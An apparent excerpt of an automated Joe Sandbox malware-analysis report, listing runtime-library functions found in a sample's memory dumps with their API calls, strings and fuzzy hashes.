Instruction Fuzzy Hash: 4E414C26B18E5695EB30CF62D9900B827A4BB59FA4F6440F3DA5E177A5DF38E436C300

Function 00007FF6399D8678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6399D86A0
_set_statfp.LIBCMT ref: 00007FF6399D86BB
_set_statfp.LIBCMT ref: 00007FF6399D86D7
_set_statfp.LIBCMT ref: 00007FF6399D8713

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 687729372eea9e8036fa62992e2affa05c689afd6e129f8f5615b9d4bf0c6b80
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: DE11E332E2CA0311F654292AD6D537911436F64374F5D46B4E96E867FFCE2CA840BD10

Function 00007FFDFF188168 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FFDFF188190
_set_statfp.LIBCMT ref: 00007FFDFF1881AB
_set_statfp.LIBCMT ref: 00007FFDFF1881C7
_set_statfp.LIBCMT ref: 00007FFDFF188203

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 87c46d79d69f5e34e67aa5715e1145e14607e1ee8230764e5151c10d466875c2
Instruction ID: 92ee3ac359501de7a2cd2d3cb8bf6960466b02a9923c5e503919531fe2c64494
Opcode Fuzzy Hash: 87c46d79d69f5e34e67aa5715e1145e14607e1ee8230764e5151c10d466875c2
Instruction Fuzzy Hash: 18113D23F58A0609F7641328EBB5B795A416F64374F448F38EA7E562DECF1CA841C10C

Function 00007FF6399CA6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6399C98B3,?,?,00000000,00007FF6399C9B4E,?,?,?,?,?,00007FF6399C9ADA), ref: 00007FF6399CA6BF
FlsSetValue.KERNEL32(?,?,?,00007FF6399C98B3,?,?,00000000,00007FF6399C9B4E,?,?,?,?,?,00007FF6399C9ADA), ref: 00007FF6399CA6DE
FlsSetValue.KERNEL32(?,?,?,00007FF6399C98B3,?,?,00000000,00007FF6399C9B4E,?,?,?,?,?,00007FF6399C9ADA), ref: 00007FF6399CA706
FlsSetValue.KERNEL32(?,?,?,00007FF6399C98B3,?,?,00000000,00007FF6399C9B4E,?,?,?,?,?,00007FF6399C9ADA), ref: 00007FF6399CA717
FlsSetValue.KERNEL32(?,?,?,00007FF6399C98B3,?,?,00000000,00007FF6399C9B4E,?,?,?,?,?,00007FF6399C9ADA), ref: 00007FF6399CA728

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
Instruction ID: 616731654ac5313871304ea53e7858ee5329dbaa38d0306afdec4538b80d1c75
Opcode Fuzzy Hash: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
Instruction Fuzzy Hash: BE117C20E0E24206FA58AB655E5127921976F983A0F0C4334E83E867DFEE2CB841AF11

Function 00007FF6399CA534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF6399CA545
FlsSetValue.KERNEL32 ref: 00007FF6399CA564
FlsSetValue.KERNEL32 ref: 00007FF6399CA58C
FlsSetValue.KERNEL32 ref: 00007FF6399CA59D
FlsSetValue.KERNEL32 ref: 00007FF6399CA5AE

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
Instruction ID: 0123f9c87a89a9f348466eec0b3e4342375da3dae7cdb4eaab8933bd94cd9a32
Opcode Fuzzy Hash: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
Instruction Fuzzy Hash: F611D620E0A2474AFA586B655D6117D22835F89360E5C9734D93E8A3DBED2CB8817F11

Function 00007FFE1463647C Relevance: 7.5, APIs: 5, Instructions: 34threadCOMMON

Download Yara Rule

APIs

_PyLong_AsInt.PYTHON311 ref: 00007FFE1463648C
PyErr_Occurred.PYTHON311 ref: 00007FFE14636499
PyEval_SaveThread.PYTHON311 ref: 00007FFE146364AD
shutdown.WS2_32 ref: 00007FFE146364BC
PyEval_RestoreThread.PYTHON311 ref: 00007FFE146364C7

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Eval_Thread$Err_Long_OccurredRestoreSaveshutdown
String ID:
API String ID: 24305128-0
Opcode ID: 8ed085b80c573facd8b5490791f9e95c22dfd687bf32148a1c5aff15e421c6a6
Instruction ID: 14f8939a0aeb9d44eebbb1e406afad2af6f7593dc9086300bc068bb25ddc7908
Opcode Fuzzy Hash: 8ed085b80c573facd8b5490791f9e95c22dfd687bf32148a1c5aff15e421c6a6
Instruction Fuzzy Hash: 5401FF25E08FC682EA649F63B4C407A63A0EF4ABB8B145570DA5E43775CF3CE8498290

Function 00007FF6399C52B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C52EC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C5416
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C54CC

Strings

verbose, xrefs: 00007FF6399C52C0

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction ID: e14dc18eaa456c9566f132e3d9cf46df633b3d18ba670df6c43864452c121b3a
Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction Fuzzy Hash: 3D91AF32E0CA8681F7219E25D85037D3793AB44B94F8C4136DA5E863DADF3CE845AF12

Function 00007FF6399CEED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399CF1B7

Part of subcall function 00007FF6399C6D4C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C6D69

Strings

UTF-8, xrefs: 00007FF6399CF136
ccs, xrefs: 00007FF6399CF0F2
UTF-16LEUNICODE, xrefs: 00007FF6399CF155

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction ID: 9cd56ff8041044eda6bc6902418fb3dec94250f8e92ca2bd75bc37c3c5ef0fbf
Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction Fuzzy Hash: 95815C76E0824385FB658F25C95027926A2EB11B48F5D8035DA0AD73DFDF2DEA41BF01

Function 00007FFE1A494288 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A4969C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4925CE), ref: 00007FFE1A4969CE

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A494407

Strings

csm, xrefs: 00007FFE1A4942D7
, xrefs: 00007FFE1A494358
csm, xrefs: 00007FFE1A494441

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: abort
String ID: $csm$csm
API String ID: 4206212132-1512788406
Opcode ID: 0334d4e6c50ab9b6f685e521b3ae1a91d89b048a29f68cf2dce9c00bf400fe87
Instruction ID: 93a17a05df57c27bedf7840d7f3837efc5bb6eb9a07de1e134653b1a5dd379d9
Opcode Fuzzy Hash: 0334d4e6c50ab9b6f685e521b3ae1a91d89b048a29f68cf2dce9c00bf400fe87
Instruction Fuzzy Hash: C9719E72B08A9186D7708B26D4446797BA0FB48FA8F1481B6DB4E07AAACF3CD571C701

Function 00007FF6399BC968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6399BC993
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6399BCA2A
RtlUnwindEx.KERNEL32 ref: 00007FF6399BCA84

Strings

csm, xrefs: 00007FF6399BCA11

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction ID: 85cf7ff13a125c7414c83070885c193e3d953da524b5bbdc941579f05ae13c1c
Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction Fuzzy Hash: C2518E32B196128ADB14CF19E454A7D77A2EB44B88F598135EA4D837CEEF7CE841DB00

Function 00007FF6399BE1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6399BE257
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6399BE2A3

Strings

MOC, xrefs: 00007FF6399BE26B
RCC, xrefs: 00007FF6399BE273

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
Instruction ID: 79c36cdff3358c03c3d1288033f1d13034dc29a003133925db73eb7d99d5ae38
Opcode Fuzzy Hash: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
Instruction Fuzzy Hash: F361A132908BC585E7248F65E4403AAB7B5FB88784F084225EB9D43BDADF7CE090DB40

Function 00007FF6399BE5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6399BE5D0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6399BE6B8

Strings

csm, xrefs: 00007FF6399BE70A
csm, xrefs: 00007FF6399BE5F2

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction ID: 8c3e25beb30d50782ae50a1a25a609d96fe1aad7d1e1f1e23ca099929f338b1b
Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction Fuzzy Hash: 18519137908246CAEB688FA1909836877BAEB54B84F1C4135DA5D87BDACF3CE4509F41

Function 00007FFE1A49F050 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

_IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE1A49F110
RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FFE1A49EE15), ref: 00007FFE1A49F15F

Strings

f, xrefs: 00007FFE1A49F08E
csm, xrefs: 00007FFE1A49F0F6

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind
String ID: csm$f
API String ID: 451473138-629598281
Opcode ID: 94627d9c7195f9c36ee16ac86650ab8a4e652cd15aa300a0b5f08846187e0d97
Instruction ID: b9c9848aea951513072663bd52ab5c60e0dc3f4844d6aa7a56ac081ab9dd0e95
Opcode Fuzzy Hash: 94627d9c7195f9c36ee16ac86650ab8a4e652cd15aa300a0b5f08846187e0d97
Instruction Fuzzy Hash: 6A51BD36B09A1286DB34CB16E444A793395FB48FA8F1081B2DA1B43768DF39ED71C740

Function 00007FFE1A494060 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A4969C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4925CE), ref: 00007FFE1A4969CE

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A494157
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE1A494167

Strings

csm, xrefs: 00007FFE1A4940AA
csm, xrefs: 00007FFE1A4941B9

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: Frameabort$EmptyHandler3::StateUnwind
String ID: csm$csm
API String ID: 4108983575-3733052814
Opcode ID: d96c539858820a31a9c1340fe1861477bc26c032fcc487563b75466d3052f7d1
Instruction ID: 04ce3b310a5c0c71ee30c119148aef7f7599a9b93ea5b33f1b453a39719025a7
Opcode Fuzzy Hash: d96c539858820a31a9c1340fe1861477bc26c032fcc487563b75466d3052f7d1
Instruction Fuzzy Hash: 15514436A08B4286EB748B16D44427976A0FB59FA5F1442F7DA9E47BA6CF3CE470C700

Function 00007FFDFF1C7CC4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97libraryloaderCOMMON

Download Yara Rule

APIs

CompareStringW.API-MS-WIN-CORE-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDFF1C96D7), ref: 00007FFDFF1C7D9B

Part of subcall function 00007FFDFF16FD08: LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFDFF1C852F,?,?,?,00007FFDFF1716D7,?,?,?,?,?,00007FFDFF151139), ref: 00007FFDFF16FD4C

GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDFF1C96D7), ref: 00007FFDFF1C7D42

Strings

AreFileApisANSI, xrefs: 00007FFDFF1C7D2A
CompareStringEx, xrefs: 00007FFDFF1C7D38

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: AddressCompareLibraryLoadProcString
String ID: AreFileApisANSI$CompareStringEx
API String ID: 3124070369-3979650549
Opcode ID: 53d3100e38a5c5142ad236b4a82f8fd86346edae10976c9a1dc651c719512429
Instruction ID: 96eeaaaaa8ee3c71c022c7e2eef46336e6e8f72944d2edc42f2fcd915148d4c7
Opcode Fuzzy Hash: 53d3100e38a5c5142ad236b4a82f8fd86346edae10976c9a1dc651c719512429
Instruction Fuzzy Hash: 9141A222B08B4586EB208B15E460BBA63A1FB89B94F044335DE7D877DDEF7CE5448740

Function 00007FFE1A49AAD8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE1A49AB32

Strings

%lf, xrefs: 00007FFE1A49AB6D, 00007FFE1A49ABA1, 00007FFE1A49ABD1

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: NameName::
String ID: %lf
API String ID: 1333004437-2891890143
Opcode ID: ce39b8ddb33b1742c1c733f8d1258caa8bc8f3cdabe38b30e72aebe8897d44a3
Instruction ID: 2231a35e0262b991c3f52c9030c9cf0269ae839dc53605db33cc58f3325fd630
Opcode Fuzzy Hash: ce39b8ddb33b1742c1c733f8d1258caa8bc8f3cdabe38b30e72aebe8897d44a3
Instruction Fuzzy Hash: BF318261B08E9685EA31DF22A8510B9A350BF59FA4F4482F7E95F47671DE2CE1228300

Function 00007FFDFF156C4C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90libraryloaderCOMMON

Download Yara Rule

APIs

LCMapStringW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,00007FFDFF178D60), ref: 00007FFDFF156D6D
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDFF178D60), ref: 00007FFDFF156D82

Strings

LCMapStringEx, xrefs: 00007FFDFF156D78
LCIDToLocaleName, xrefs: 00007FFDFF156D16

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: AddressProcString
String ID: LCIDToLocaleName$LCMapStringEx
API String ID: 3874510993-3928102921
Opcode ID: 21d608e762aa8d5241e270ca3b9f1440e5f0230c6ecd93d51b02b851cecab4fb
Instruction ID: c3a738d051cd7d20f1d4a38e20796b3abea266afcc5f99246503f598ceeab78c
Opcode Fuzzy Hash: 21d608e762aa8d5241e270ca3b9f1440e5f0230c6ecd93d51b02b851cecab4fb
Instruction Fuzzy Hash: BF31C222B08A4186EB208B25E820B6A63A1FB88BD4F044735DD7DC77D9DF3CE9058740

Function 00007FFDFF1C7E54 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(?,?,?,?,?,?,?,00007FFDFF2078D0,?,?,?,?,?,?,?,?), ref: 00007FFDFF1C7F23

Part of subcall function 00007FFDFF16FD08: LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFDFF1C852F,?,?,?,00007FFDFF1716D7,?,?,?,?,?,00007FFDFF151139), ref: 00007FFDFF16FD4C

